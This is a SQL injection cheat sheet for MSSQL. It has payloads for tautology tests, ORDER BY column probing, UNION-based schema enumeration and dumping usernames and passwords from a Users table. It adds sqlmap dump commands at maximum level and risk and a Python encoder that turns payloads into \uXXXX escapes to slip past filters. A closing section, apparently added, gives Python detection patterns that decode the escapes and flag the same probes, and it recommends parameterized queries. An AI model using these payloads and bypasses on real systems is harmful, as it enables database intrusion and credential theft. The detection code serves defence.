SQL Injection

MSSQL

Test

' or 1=1-- -

Identify the number of columns

Start at 1 (column) and increase until an error or different content is returned:

' order by 1-- -

' order by 7-- -

Confirm the number of columns

' union select 1,2,@@VERSION,DB_NAME(),5,6-- -

Get tables

' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- -

Get columns from table Users

' union select 1,2,name,4,5,6 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Users')-- -

Dump data from table Users

' union select 1,2,username,password,4,5 FROM Users-- -

SQLMAP

Use file

sqlmap -r file.txt --batch --level 5 --risk 3

Post request

sqlmap -u 'https://website/page.php' -X POST --data 'action=edit&id=3' --cookie="abcdefg12345" --batch --dump --level 5 --risk 3

Bypass

Encode the payload as UTF-16 \uXXXX escapes

# Read the payload and emit every character as a 4-digit \uXXXX escape.
user_input = input('> ').strip()
utf = [f"\\u{ord(i):04x}" for i in user_input]
print(''.join(utf))
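
The defender's view of the encoding above, as an added example that is not part of the original page: a filter that matches on the raw request text misses the \uXXXX-escaped form, so this code decodes the escapes before matching the probe shapes listed on this page. The rule names, function names and sample values are assumptions constructed for illustration.

```python
import re

# Assumed rule names; each pattern covers one probe shape listed on this page.
SIGNATURES = {
    "tautology": re.compile(r"'\s*or\s+1\s*=\s*1", re.I),
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(
        r"\b(information_schema\.tables|syscolumns|sysobjects)\b", re.I),
}
U_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Constructed sample: the page's test string after the \uXXXX encoder above.
ENCODED = (r"\u0027\u0020\u006f\u0072\u0020\u0031\u003d\u0031"
           r"\u002d\u002d\u0020\u002d")

# Constructed request-field values, as a proxy or WAF would see them.
SAMPLES = [
    "3",
    "order by date",
    "' or 1=1-- -",
    ENCODED,
    "' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- -",
]


def normalize(value):
    # Decode literal \uXXXX escapes; repeat (bounded) to catch double escaping.
    for _ in range(3):
        decoded = U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(value, decode=True):
    # Return the sorted names of the signatures that match the field value.
    text = normalize(value) if decode else value
    return sorted(n for n, rx in SIGNATURES.items() if rx.search(text))


if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{scan(sample, decode=False)!s:32} {scan(sample)!s:32} {sample}")
```

Pattern matching like this is a detection aid only; the fix for the injection itself is parameterized queries in the application.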